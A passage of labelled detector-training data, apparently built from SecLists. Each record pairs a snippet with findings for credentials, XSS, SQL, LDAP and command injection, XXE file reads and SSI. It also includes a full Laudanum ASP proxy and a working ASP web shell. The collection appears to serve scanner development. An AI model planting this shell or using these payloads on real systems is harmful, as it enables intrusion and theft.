"MIT", "text": "# credentials.txt\nadmin:mutant", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "mutant"}}]} {"id": "seclists_01213", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: kishor</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: kishor", "injection_type": "XSS"}}]} {"id": "seclists_01214", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%\t25%5c..%25%5c..%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%\t25%5c..%25%5c..%00", "injection_type": "cmd"}}]} {"id": "seclists_01215", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=A very short cross browser header injection HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "A very short cross browser header injection", "injection_type": "XSS"}}]} {"id": "seclists_01216", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '' or username like '%';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or username like '%", "injection_type": "SQL"}}]} {"id": "seclists_01217", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:stroke@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "stroke"}}]} {"id": "seclists_01218", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><style>@keyframes slidein {}</style><div style=\"animation-duration:1s;animation-name:slidein;animation-iteration-count:2\" onanimationiteration=\"alert(1)\"></div></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes slidein {}</style><div style=\"animation-duration:1s;animation-name:slidein;animation-iteration-count:2\" onanimationiteration=\"alert(1)\"></div>", "injection_type": "XSS"}}]} {"id": "seclists_01219", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////dev/random\">]><foo>&xxe;</foo>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////dev/random\">]><foo>&xxe;</foo>", "injection_type": "XXE"}}]} {"id": "seclists_01220", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<legend ondblclick=\"alert(1)\">test</legend> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<legend ondblclick=\"alert(1)\">test</legend>", "injection_type": "XSS"}}]} {"id": "seclists_01221", "source": "seclists", "source_license": "MIT", "text": "password: 272727\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "272727"}}]} {"id": "seclists_01222", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><main oncopy=\"alert(1)\" contenteditable>test</main></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<main oncopy=\"alert(1)\" contenteditable>test</main>", "injection_type": "XSS"}}]} {"id": "seclists_01223", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0aecho%20QDWRHU$((33%2B84))$(echo%20QDWRHU)QDWRHU%22 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho%20QDWRHU$((33%2B84))$(echo%20QDWRHU)QDWRHU%22", "injection_type": "cmd"}}]} {"id": "seclists_01224", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<font id=x tabindex=1 onbeforedeactivate=alert(1)></font><input autofocus>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<font id=x tabindex=1 onbeforedeactivate=alert(1)></font><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_01225", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &lt;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&lt;", "injection_type": "cmd"}}]} {"id": "seclists_01226", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\\nid| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\nid|", "injection_type": "cmd"}}]} {"id": "seclists_01227", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ||echo%20SJZFWV$((8%2B68))$(echo%20SJZFWV)SJZFWV%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||echo%20SJZFWV$((8%2B68))$(echo%20SJZFWV)SJZFWV%27", "injection_type": "cmd"}}]} {"id": "seclists_01228", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Oracle,CQSCHEMAUSER,PASSWORD,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,CQSCHEMAUSER,PASSWORD,"}}]} {"id": "seclists_01229", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Develcon,<N/A>,password,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Develcon,<N/A>,password,"}}]} {"id": "seclists_01230", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><caption onclick=\"alert(1)\">test</caption></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<caption onclick=\"alert(1)\">test</caption>", "injection_type": "XSS"}}]} {"id": "seclists_01231", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit String: ';alert(0)//\\';alert(1)//\";alert(2)//\\\";alert(3)//--></SCRIPT>\">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}\");}</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: ';alert(0)//\\';alert(1)//\";alert(2)//\\\";alert(3)//--></SCRIPT>\">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}\");}", "injection_type": "XSS"}}]} {"id": "seclists_01232", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf >", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ">", "injection_type": "cmd"}}]} {"id": "seclists_01233", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = admin\" #", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\" #", "injection_type": "SQL"}}]} {"id": "seclists_01234", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ||echo$IFSETWMKB$((45%2B66))$(echo$IFSETWMKB)ETWMKB", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||echo$IFSETWMKB$((45%2B66))$(echo$IFSETWMKB)ETWMKB", "injection_type": "cmd"}}]} {"id": "seclists_01235", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<slot onkeydown=\"alert(1)\" contenteditable>test</slot> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<slot onkeydown=\"alert(1)\" contenteditable>test</slot>", "injection_type": "XSS"}}]} {"id": "seclists_01236", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><svg id=x tabindex=1 onbeforeactivate=alert(1)></svg></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg id=x tabindex=1 onbeforeactivate=alert(1)></svg>", "injection_type": "XSS"}}]} {"id": "seclists_01237", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector).</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector).", "injection_type": "XSS"}}]} {"id": "seclists_01238", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><bgsound oncut=\"alert(1)\" contenteditable>test</bgsound></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<bgsound oncut=\"alert(1)\" contenteditable>test</bgsound>", "injection_type": "XSS"}}]} {"id": "seclists_01239", "source": "seclists", "source_license": "MIT", "text": "username=x' AND 1=(SELECT COUNT(*) FROM tabname); --&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "x' AND 1=(SELECT COUNT(*) FROM tabname); --", "injection_type": "SQL"}}]} {"id": "seclists_01240", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26", "injection_type": "cmd"}}]} {"id": "seclists_01241", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %3B%20str%3D%24%28echo%20MJSZOL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20MJSZOL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//", "injection_type": "cmd"}}]} {"id": "seclists_01242", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<body onresize=alert(1)>press F12!\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body onresize=alert(1)>press F12!", "injection_type": "XSS"}}]} {"id": "seclists_01243", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = replace", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "replace", "injection_type": "SQL"}}]} {"id": "seclists_01244", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 1=1#';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1#", "injection_type": "SQL"}}]} {"id": "seclists_01245", "source": "seclists", "source_license": "MIT", "text": "# LDAP query log\nsearchFilter: x' or name()='username' or 'x'='y", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "x' or name()='username' or 'x'='y", "injection_type": "LDAP"}}]} {"id": "seclists_01246", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Digicorp,<BLANK>,BRIDGE,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digicorp,<BLANK>,BRIDGE,"}}]} {"id": "seclists_01247", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#x000003C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x000003C", "injection_type": "cmd"}}]} {"id": "seclists_01248", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Gandalf,<BLANK>,gandalf,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Gandalf,<BLANK>,gandalf,"}}]} {"id": "seclists_01249", "source": "seclists", "source_license": "MIT", "text": "password: 54321\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "54321"}}]} {"id": "seclists_01250", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=EverFocus,admin,admin,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "EverFocus,admin,admin,"}}]} {"id": "seclists_01251", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:excess@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "excess"}}]} {"id": "seclists_01252", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><colgroup onkeyup=\"alert(1)\" contenteditable>test</colgroup></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<colgroup onkeyup=\"alert(1)\" contenteditable>test</colgroup>", "injection_type": "XSS"}}]} {"id": "seclists_01253", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><html ontouchstart=alert(1)></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<html ontouchstart=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_01254", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Closing JS Tag in JS String assignment</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Closing JS Tag in JS String assignment", "injection_type": "XSS"}}]} {"id": "seclists_01255", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<noscript onmouseenter=\"alert(1)\">test</noscript> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<noscript onmouseenter=\"alert(1)\">test</noscript>", "injection_type": "XSS"}}]} {"id": "seclists_01256", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><div draggable=\"true\" contenteditable>drag me</div><code ondragover=alert(1) contenteditable>drop here</code></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><code ondragover=alert(1) contenteditable>drop here</code>", "injection_type": "XSS"}}]} {"id": "seclists_01257", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, JSON, concatenated, obfuscated HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, JSON, concatenated, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_01258", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <div&nbsp &nbsp style=\\-\\mo\\z\\-b\\i\\nd\\in\\g:\\url(//business\\i\\nfo.co.uk\\/labs\\/xbl\\/xbl\\.xml\\#xss)> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <div&nbsp &nbsp style=\\-\\mo\\z\\-b\\i\\nd\\in\\g:\\url(//business\\i\\nfo.co.uk\\/labs\\/xbl\\/xbl\\.xml\\#xss)>", "injection_type": "XSS"}}]} {"id": "seclists_01259", "source": "seclists", "source_license": "MIT", "text": "password: huai\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "huai"}}]} {"id": "seclists_01260", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%27;echo$IFSOTEELC$((4%2B24))$(echo$IFSOTEELC)OTEELC// HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27;echo$IFSOTEELC$((4%2B24))$(echo$IFSOTEELC)OTEELC//", "injection_type": "cmd"}}]} {"id": "seclists_01261", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Obfuscated XML predicate vector variation 3</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Obfuscated XML predicate vector variation 3", "injection_type": "XSS"}}]} {"id": "seclists_01262", "source": "seclists", "source_license": "MIT", "text": "<%@Language=\"VBScript\"%>\n<%Option Explicit%>\n<%Response.Buffer = True%> \n<%\n' *******************************************************************************\n' ***\n' *** Laudanum Project\n' *** A Collection of Injectable Files used during a Penetration Test\n' ***\n' *** More information is available at:\n' *** http://laudanum.secureideas.net\n' *** laudanum@secureideas.net\n' ***\n' *** Project Leads:\n' *** Kevin Johnson <kjohnson@secureideas.net\n' *** Tim Medin <tim@counterhack.com>\n' ***\n' *** Copyright 2014 by Kevin Johnson and the Laudanum Team\n' ***\n' ********************************************************************************\n' ***\n' *** This file provides access as a proxy.\n' *** Written by Tim Medin <tim@counterhack.com>\n' ***\n' ********************************************************************************\n' *** This program is free software; you can redistribute it and/or\n' *** modify it under the terms of the GNU General Public License\n' *** as published by the Free Software Foundation; either version 2\n' *** of the License, or (at your option) any later version.\n' ***\n' *** This program is distributed in the hope that it will be useful,\n' *** but WITHOUT ANY WARRANTY; without even the implied warranty of\n' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n' *** GNU General Public License for more details.\n' ***\n' *** You can get a copy of the GNU General Public License from this\n' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n' *** You can also write to the Free Software Foundation, Inc., Temple\n' *** Place - Suite Boston, MA USA.\n' ***\n' ***************************************************************************** */\n \n' ***************** Config entries below ***********************\n\n' Define variables\nDim allowedIPs \nDim allowed\nDim i\nDim s 'generic string, yeah, I know bad, but at this point I just want it to work\nDim urltemp \nDim urlscheme\nDim urlhost\nDim urlport\nDim urlpath\nDim urlfile\nDim urlquery\nDim http \nDim method\nDim contenttype\nDim stream\nDim regex\nDim body\nDim params\n\nfunction err_handler()\n\t%>\n<html>\n<head>\n <title>Laudanum ASP Proxy</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <%=Err.Number%><br/>\n <%=Err.Message%><br/>\n <hr/>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n</body>\n</html><%\nend function\n\nfunction CleanQueryString\n' removes laudurl from the querystring\nDim i\nDim j\nDim s\nDim key\nDim q\n\n\n\tif len(request.querystring) = 0 then\n\t\tCleanQueryString = \"\"\n\t\texit function\n\tend if\n\n\t' build the request parameters\n\tfor i = 1 to request.querystring.count\n\t\tkey = request.querystring.key(i)\n\t\t'response.write \"<br/>key:\" & key\n\t\tif key = \"laudurl\" then\n\t\t\t' if the key is laudurl, we need check if there is a ? in the string since \n\t\t\t' it may have its own query string that doesn't get parsed properly.\n\t\t\ts = split(request.querystring(\"laudurl\"), \"?\")\n\t\t\tif ubound(s) > lbound(s) then\n\t\t\t\t' laudurl contains a ?, it must be manually parsed\n\t\t\t\tkey = left(s(1), instr(s(1), \"=\") - 1)\n\t\t\t\tq = q & \"&\" & key & \"=\" & mid(s(1), len(key) + 2)\n\t\t\tend if\n\t\telse\n\t\t\tfor j = 1 to request.querystring(key).count\n \t'response.write \"<br/> -value:\" & request.querystring(key)(j)\n\t\t\t\tq = q & \"&\" & key & \"=\" & request.querystring(key)(j)\n\t\t\tnext\n\t\tend if\n\tnext\n\n\tif len(q) > 0 then\n\t\tCleanQueryString = \"?\" & mid(q, 2)\n\telse\n\t\tCleanQueryString = \"\"\n\tend if\nend function\n \nfunction CleanFormValues()\nDim r\n\tSet r = New RegExp\n\tr.IgnoreCase = true\n\tr.Global = true\n\n\t' remove the laudurl paramater \n\tr.Pattern = \"laudurl=[^&]+($|&)\"\n\tCleanFormValues = r.Replace(request.form, \"\") \n\tSet r = nothing\nend function\n\nsub ParseUrl()\n' parses the url into the global variables\nDim urltemp\nDim url\n\n\t'get the url, it may be in the querystring fo", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "asp", "filename": "proxy.asp"}}]} {"id": "seclists_01263", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<!ENTITY % xxe SYSTEM \"php://filter/convert.base64-encode/resource=/etc/passwd\" >", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<!ENTITY % xxe SYSTEM \"php://filter/convert.base64-encode/resource=/etc/passwd\" >", "injection_type": "XXE"}}]} {"id": "seclists_01264", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#x03c", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x03c", "injection_type": "cmd"}}]} {"id": "seclists_01265", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0aecho$IFSODUPZQ$((21%2B13))$(echo$IFSODUPZQ)ODUPZQ%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho$IFSODUPZQ$((21%2B13))$(echo$IFSODUPZQ)ODUPZQ%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01266", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"document_name\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"document_name\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01267", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><ul id=x tabindex=1 ondeactivate=alert(1)></ul><input id=y autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<ul id=x tabindex=1 ondeactivate=alert(1)></ul><input id=y autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_01268", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %22%7C%20%5B%203%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%7C%20%5B%203%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01269", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"XML HTML+TIME\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "XML HTML+TIME", "injection_type": "XSS"}}]} {"id": "seclists_01270", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>", "injection_type": "XSS"}}]} {"id": "seclists_01271", "source": "seclists", "source_license": "MIT", "text": "<%\n' *******************************************************************************\n' ***\n' *** Laudanum Project\n' *** A Collection of Injectable Files used during a Penetration Test\n' ***\n' *** More information is available at:\n' *** http://laudanum.secureideas.net\n' *** laudanum@secureideas.net\n' ***\n' *** Project Leads:\n' *** Kevin Johnson <kjohnson@secureideas.net\n' *** Tim Medin <tim@counterhack.com>\n' ***\n' *** Copyright 2014 by Kevin Johnson and the Laudanum Team\n' ***\n' ********************************************************************************\n' ***\n' *** Updated and fixed by Robin Wood <Digininja>\n' *** Updated and fixed by Tim Medin <tim@counterhack.com\n' ***\n' ********************************************************************************\n' *** This program is free software; you can redistribute it and/or\n' *** modify it under the terms of the GNU General Public License\n' *** as published by the Free Software Foundation; either version 2\n' *** of the License, or (at your option) any later version.\n' ***\n' *** This program is distributed in the hope that it will be useful,\n' *** but WITHOUT ANY WARRANTY; without even the implied warranty of\n' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n' *** GNU General Public License for more details.\n' ***\n' *** You can get a copy of the GNU General Public License from this\n' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n' *** You can also write to the Free Software Foundation, Inc., Temple\n' *** Place - Suite Boston, MA USA.\n' ***\n' ***************************************************************************** */\n\n\n' can set this to 0 for never time out but don't want to kill the server if a script\n' goes into a loop for any reason\nServer.ScriptTimeout = 180\n\nip=request.ServerVariables(\"REMOTE_ADDR\")\nif ip<>\"1.2.3.4\" then\n response.Status=\"404 Page Not Found\"\n response.Write(response.Status)\n response.End\nend if\n\nif Request.Form(\"submit\") <> \"\" then\n Dim wshell, intReturn, strPResult\n cmd = Request.Form(\"cmd\")\n Response.Write (\"Running command: \" & cmd & \"<br />\")\n set wshell = CreateObject(\"WScript.Shell\")\n Set objCmd = wShell.Exec(cmd)\n strPResult = objCmd.StdOut.Readall()\n\n response.write \"<br><pre>\" & replace(replace(strPResult,\"<\",\"&lt;\"),vbCrLf,\"<br>\") & \"</pre>\"\n\n set wshell = nothing\nend if\n\n%>\n<html>\n<head><title>Laundanum ASP Shell</title></head>\n<body onload=\"document.shell.cmd.focus()\">\n<form action=\"shell.asp\" method=\"POST\" name=\"shell\">\nCommand: <Input width=\"200\" type=\"text\" name=\"cmd\" value=\"<%=cmd%>\" /><br />\n<input type=\"submit\" name=\"submit\" value=\"Submit\" />\n<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\\Windows\\System32\\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.\n<p>Example command to do a directory listing:<br>\n%ComSpec% /c dir\n</form>\n<hr/>\n<address>\nCopyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\nWritten by Tim Medin.<br/>\nGet the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n</address>\n</body>\n</html>\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "asp", "filename": "shell.asp"}}]} {"id": "seclists_01272", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %22%7C%7Cecho$IFSBKQQRP$((31%2B59))$(echo$IFSBKQQRP)BKQQRP", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%7C%7Cecho$IFSBKQQRP$((31%2B59))$(echo$IFSBKQQRP)BKQQRP", "injection_type": "cmd"}}]} {"id": "seclists_01273", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]>", "injection_type": "XXE"}}]} {"id": "seclists_01274", "source": "seclists", "source_license": "MIT", "text": 